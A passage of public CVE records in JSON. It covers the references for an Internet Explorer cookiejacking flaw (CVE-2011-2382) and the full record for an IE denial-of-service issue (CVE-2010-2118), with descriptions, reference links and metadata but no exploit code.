"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2382",
"datePublished": "2011-06-03T17:00:00Z",
"dateReserved": "2011-06-03T00:00:00Z",
"dateUpdated": "2024-09-17T02:41:25.100Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-2118 (GCVE-0-2010-2118)
Vulnerability from nvd – Published: 2010-06-01 20:00 – Updated: 2024-08-07 02:25
VLAI?
Summary
Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:25:06.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-2118",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4238/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-2118",
"datePublished": "2010-06-01T20:00:00",
"dateReserved": "2010-06-01T00:00:00",
"dateUpdated": "2024-08-07T02:25:06.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}